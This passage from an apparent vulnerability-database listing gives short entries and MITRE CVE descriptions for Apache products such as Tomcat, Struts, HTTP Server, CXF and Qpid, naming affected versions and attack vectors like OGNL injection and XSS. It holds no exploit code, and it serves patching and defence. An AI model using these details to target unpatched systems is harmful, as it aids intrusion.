13781| [38524] Apache Geronimo 2.0 unknown vulnerability
13782| [3256] Apache Tomcat up to 6.0.13 cross site scripting
13783| [38331] Apache Tomcat 4.1.24 information disclosure
13784| [38330] Apache Tomcat 4.1.24 information disclosure
13785| [38185] Apache Tomcat 3.3/3.3.1/3.3.1a/3.3.2 Error Message CookieExample cross site scripting
13786| [37967] Apache Tomcat up to 4.1.36 Error Message sendmail.jsp cross site scripting
13787| [37647] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 Authorization unknown vulnerability
13788| [37646] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 unknown vulnerability
13789| [3141] Apache Tomcat up to 4.1.31 Accept-Language Header cross site scripting
13790| [3133] Apache Tomcat up to 6.0 HTTP cross site scripting
13791| [37292] Apache Tomcat up to 5.5.1 cross site scripting
13792| [3130] Apache OpenOffice 2.2.1 RTF Document Heap-based memory corruption
13793| [36981] Apache Tomcat JK Web Server Connector up to 1.2.22 mod_jk directory traversal
13794| [36892] Apache Tomcat up to 4.0.0 hello.jsp cross site scripting
13795| [37320] Apache MyFaces Tomahawk up to 1.1.4 cross site scripting
13796| [36697] Apache Tomcat up to 5.5.17 implicit-objects.jsp cross site scripting
13797| [36491] Apache Axis 1.0 Installation javaioFileNotFoundException information disclosure
13798| [36400] Apache Tomcat 5.5.15 mod_jk cross site scripting
13799| [36698] Apache Tomcat up to 4.0.0 cal2.jsp cross site scripting
13800| [36224] XAMPP Apache Distribution up to 1.6.0a adodb.php connect memory corruption
13801| [36225] XAMPP Apache Distribution 1.6.0a sql injection
13802| [2997] Apache httpd/Tomcat 5.5/6.0 directory traversal
13803| [35896] Apache Apache Test up to 1.29 mod_perl denial of service
13804| [35653] Avaya S8300 Cm 3.1.2 Apache Tomcat unknown vulnerability
13805| [35402] Apache Tomcat JK Web Server Connector 1.2.19 mod_jk.so map_uri_to_worker memory corruption
13806| [35067] Apache Stats up to 0.0.2 extract unknown vulnerability
13807| [35025] Apache Stats up to 0.0.3 extract unknown vulnerability
13808| [34252] Apache HTTP Server denial of service
13809| [2795] Apache OpenOffice 2.0.4 WMF/EMF File Heap-based memory corruption
13810| [33877] Apache Opentaps 0.9.3 cross site scripting
13811| [33876] Apache Open For Business Project unknown vulnerability
13812| [33875] Apache Open For Business Project cross site scripting
13813| [2703] Apache Jakarta Tomcat up to 5.x der_get_oid memory corruption
13814| [2611] Apache HTTP Server up to 1.0.1 set_var Format String
13815|
13816| MITRE CVE - https://cve.mitre.org:
13817| [CVE-2013-4156] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted element in an OOXML document file.
13818| [CVE-2013-4131] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.
13819| [CVE-2013-3239] phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir directory is configured, allows remote authenticated users to execute arbitrary code by using a double extension in the filename of an export file, leading to interpretation of this file as an executable file by the Apache HTTP Server, as demonstrated by a .php.sql filename.
13820| [CVE-2013-3060] The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.
13821| [CVE-2013-2765] The ModSecurity module before 2.7.4 for the Apache HTTP Server allows remote attackers to cause a denial of service (NULL pointer dereference, process crash, and disk consumption) via a POST request with a large body and a crafted Content-Type header.
13822| [CVE-2013-2251] Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
13823| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
13824| [CVE-2013-2248] Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
13825| [CVE-2013-2189] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via invalid PLCF data in a DOC document file.
13826| [CVE-2013-2135] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice.
13827| [CVE-2013-2134] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.
13828| [CVE-2013-2115] Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.
13829| [CVE-2013-2071] java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.
13830| [CVE-2013-2067] java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.
13831| [CVE-2013-1966] Apache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.
13832| [CVE-2013-1965] Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
13833| [CVE-2013-1896] mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.
13834| [CVE-2013-1884] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (segmentation fault and crash) via a log REPORT request with an invalid limit, which triggers an access of an uninitialized variable.
13835| [CVE-2013-1879] Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."
13836| [CVE-2013-1862] mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.
13837| [CVE-2013-1849] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a PROPFIND request for an activity URL.
13838| [CVE-2013-1847] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an anonymous LOCK for a URL that does not exist.
13839| [CVE-2013-1846] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a LOCK on an activity URL.
13840| [CVE-2013-1845] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (memory consumption) by (1) setting or (2) deleting a large number of properties for a file or directory.
13841| [CVE-2013-1814] The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.
13842| [CVE-2013-1777] The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not property implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
13843| [CVE-2013-1768] The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and 2.x before 2.2.2 creates local executable JSP files containing logging trace data produced during deserialization of certain crafted OpenJPA objects, which makes it easier for remote attackers to execute arbitrary code by creating a serialized object and leveraging improperly secured server programs.
13844| [CVE-2013-1088] Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 before SP6 Patch 1 allows remote attackers to hijack the authentication of arbitrary users by leveraging improper request validation by iManager code deployed within an Apache Tomcat container.
13845| [CVE-2013-1048] The Debian apache2ctl script in the apache2 package squeeze before 2.2.16-6+squeeze11, wheezy before 2.2.22-13, and sid before 2.2.22-13 for the Apache HTTP Server on Debian GNU/Linux does not properly create the /var/lock/apache2 lock directory, which allows local users to gain privileges via an unspecified symlink attack.
13846| [CVE-2013-0966] The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac OS X before 10.8.3 does not properly handle ignorable Unicode characters, which allows remote attackers to bypass intended directory authentication requirements via a crafted pathname in a URI.
13847| [CVE-2013-0942] Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Agent 7.1 before 7.1.1 for Web for Internet Information Services, and 7.1 before 7.1.1 for Web for Apache, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13848| [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data.
13849| [CVE-2013-0253] The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
13850| [CVE-2013-0248] The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack.
13851| [CVE-2013-0239] Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.
13852| [CVE-2012-6573] Cross-site scripting (XSS) vulnerability in the Apache Solr Autocomplete module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors involving autocomplete results.
13853| [CVE-2012-6551] The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.
13854| [CVE-2012-6092] Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.
13855| [CVE-2012-5887] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.
13856| [CVE-2012-5886] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.
13857| [CVE-2012-5885] The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.
13858| [CVE-2012-5786] The wsdl_first_https sample code in distribution/src/main/release/samples/wsdl_first_https/src/main/ in Apache CXF, possibly 2.6.0, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13859| [CVE-2012-5785] Apache Axis2/Java 1.6.2 and earlier does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13860| [CVE-2012-5784] Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13861| [CVE-2012-5783] Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13862| [CVE-2012-5633] The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.
13863| [CVE-2012-5616] Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly Citrix CloudStack) before 3.0.6 stores sensitive information in the log4j.conf log file, which allows local users to obtain (1) the SSH private key as recorded by the createSSHKeyPair API, (2) the password of an added host as recorded by the AddHost API, or the password of an added VM as recorded by the (3) DeployVM or (4) ResetPasswordForVM API.
13864| [CVE-2012-5568] Apache Tomcat through 7.0.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.
13865| [CVE-2012-5351] Apache Axis2 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a "Signature exclusion attack," a different vulnerability than CVE-2012-4418.
13866| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
13867| [CVE-2012-4557] The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.
13868| [CVE-2012-4556] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 allows remote attackers to cause a denial of service (Apache httpd web server child process restart) via certain unspecified empty search fields in a user certificate search query.
13869| [CVE-2012-4555] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 does not properly handle interruptions of token format operations, which allows remote attackers to cause a denial of service (NULL pointer dereference and Apache httpd web server child process crash) via unspecified vectors.
13870| [CVE-2012-4534] org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28, when the NIO connector is used in conjunction with sendfile and HTTPS, allows remote attackers to cause a denial of service (infinite loop) by terminating the connection during the reading of a response.
13871| [CVE-2012-4528] The mod_security2 module before 2.7.0 for the Apache HTTP Server allows remote attackers to bypass rules, and deliver arbitrary POST data to a PHP application, via a multipart request in which an invalid part precedes the crafted data.
13872| [CVE-2012-4501] Citrix Cloud.com CloudStack, and Apache CloudStack pre-release, allows remote attackers to make arbitrary API calls by leveraging the system user account, as demonstrated by API calls to delete VMs.
13873| [CVE-2012-4460] The serializing/deserializing functions in the qpid::framing::Buffer class in Apache Qpid 0.20 and earlier allow remote attackers to cause a denial of service (assertion failure and daemon exit) via unspecified vectors. NOTE: this issue could also trigger an out-of-bounds read, but it might not trigger a crash.
13874| [CVE-2012-4459] Integer overflow in the qpid::framing::Buffer::checkAvailable function in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (crash) via a crafted message, which triggers an out-of-bounds read.
13875| [CVE-2012-4458] The AMQP type decoder in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (memory consumption and server crash) via a large number of zero width elements in the client-properties map in a connection.start-ok message.
13876| [CVE-2012-4446] The default configuration for Apache Qpid 0.20 and earlier, when the federation_tag attribute is enabled, accepts AMQP connections without checking the source user ID, which allows remote attackers to bypass authentication and have other unspecified impact via an AMQP request.
13877| [CVE-2012-4431] org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.
13878| [CVE-2012-4418] Apache Axis2 allows remote attackers to forge messages and bypass authentication via an "XML Signature wrapping attack."
13879| [CVE-2012-4387] Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.
13880| [CVE-2012-4386] The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.
13881| [CVE-2012-4360] Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0.10.19.1 through 0.10.22.4 for the Apache HTTP Server allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13882| [CVE-2012-4063] The Apache Santuario configuration in Eucalyptus before 3.1.1 does not properly restrict applying XML Signature transforms to documents, which allows remote attackers to cause a denial of service via unspecified vectors.
13883| [CVE-2012-4001] The mod_pagespeed module before 0.10.22.6 for the Apache HTTP Server does not properly verify its host name, which allows remote attackers to trigger HTTP requests to arbitrary hosts via unspecified vectors, as demonstrated by requests to intranet servers.
13884| [CVE-2012-3908] Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE Administrator user interface (aka the Apache Tomcat interface) on Cisco Identity Services Engine (ISE) 3300 series appliances before 1.1.0.665 Cumulative Patch 1 allow remote attackers to hijack the authentication of administrators, aka Bug ID CSCty46684.
13885| [CVE-2012-3546] org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.30, when FORM authentication is used, allows remote attackers to bypass security-constraint checks by leveraging a previous setUserPrincipal call and then placing /j_security_check at the end of a URI.
13886| [CVE-2012-3544] Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.
13887| [CVE-2012-3526] The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the Apache HTTP Server allows remote attackers to cause a denial of service (server or application crash) via multiple X-Forwarded-For headers in a request.
13888| [CVE-2012-3513] munin-cgi-graph in Munin before 2.0.6, when running as a CGI module under Apache, allows remote attackers to load new configurations and create files in arbitrary directories via the logdir command.
13889| [CVE-2012-3506] Unspecified vulnerability in the Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.03 has unknown impact and attack vectors.
13890| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
13891| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
13892| [CVE-2012-3467] Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism to authenticate catch-up shadow connections to AMQP brokers, which allows remote attackers to bypass authentication.
13893| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
13894| [CVE-2012-3446] Apache Libcloud before 0.11.1 uses an incorrect regular expression during verification of whether the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a crafted certificate.
13895| [CVE-2012-3376] DataNodes in Apache Hadoop 2.0.0 alpha does not check the BlockTokens of clients when Kerberos is enabled and the DataNode has checked out the same BlockPool twice from a NodeName, which might allow remote clients to read arbitrary blocks, write to blocks to which they only have read access, and have other unspecified impacts.
13896| [CVE-2012-3373] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app.
13897| [CVE-2012-3126] Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Apache Tomcat Agent.
13898| [CVE-2012-3123] Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect confidentiality, related to Apache HTTP Server.
13899| [CVE-2012-2760] mod_auth_openid before 0.7 for Apache uses world-readable permissions for /tmp/mod_auth_openid.db, which allows local users to obtain session ids.
13900| [CVE-2012-2733] java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP NIO connector in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28 does not properly restrict the request-header size, which allows remote attackers to cause a denial of service (memory consumption) via a large amount of header data.
13901| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
13902| [CVE-2012-2381] Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.
13903| [CVE-2012-2380] Multiple cross-site request forgery (CSRF) vulnerabilities in the admin/editor console in Apache Roller before 5.0.1 allow remote attackers to hijack the authentication of admins or editors by leveraging the HTTP POST functionality.
13904| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
13905| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
13906| [CVE-2012-2329] Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.
13907| [CVE-2012-2145] Apache Qpid 0.17 and earlier does not properly restrict incoming client connections, which allows remote attackers to cause a denial of service (file descriptor consumption) via a large number of incomplete connections.
13908| [CVE-2012-2138] The @CopyFrom operation in the POST servlet in the org.apache.sling.servlets.post bundle before 2.1.2 in Apache Sling does not prevent attempts to copy an ancestor node to a descendant node, which allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP request.
13909| [CVE-2012-2098] Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.
13910| [CVE-2012-1574] The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.
13911| [CVE-2012-1181] fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.
13912| [CVE-2012-1089] Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.
13913| [CVE-2012-1007] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.
13914| [CVE-2012-1006] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.
13915| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
13916| [CVE-2012-0840] tables/apr_hash.c in the Apache Portable Runtime (APR) library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
13917| [CVE-2012-0838] Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.
13918| [CVE-2012-0788] The PDORow implementation in PHP before 5.3.9 does not properly interact with the session feature, which allows remote attackers to cause a denial of service (application crash) via a crafted application that uses a PDO driver for a fetch and then calls the session_start function, as demonstrated by a crash of the Apache HTTP Server.
13919| [CVE-2012-0394] ** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
13920| [CVE-2012-0393] The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.
13921| [CVE-2012-0392] The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
13922| [CVE-2012-0391] The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.
13923| [CVE-2012-0256] Apache Traffic Server 2.0.x and 3.0.x before 3.0.4 and 3.1.x before 3.1.3 does not properly allocate heap memory, which allows remote attackers to cause a denial of service (daemon crash) via a long HTTP Host header.
13924| [CVE-2012-0216] The default configuration of the apache2 package in Debian GNU/Linux squeeze before 2.2.16-6+squeeze7, wheezy before 2.2.22-4, and sid before 2.2.22-4, when mod_php or mod_rivet is used, provides example scripts under the doc/ URI, which might allow local users to conduct cross-site scripting (XSS) attacks, gain privileges, or obtain sensitive information via vectors involving localhost HTTP requests to the Apache HTTP Server.
13925| [CVE-2012-0213] The UnhandledDataStructure function in hwpf/model/UnhandledDataStructure.java in Apache POI 3.8 and earlier allows remote attackers to cause a denial of service (OutOfMemoryError exception and possibly JVM destabilization) via a crafted length value in a Channel Definition Format (CDF) or Compound File Binary Format (CFBF) document.
13926| [CVE-2012-0053] protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
13927| [CVE-2012-0047] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.
13928| [CVE-2012-0031] scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.
13929| [CVE-2012-0022] Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.
13930| [CVE-2012-0021] The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.
13931| [CVE-2011-5064] DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.
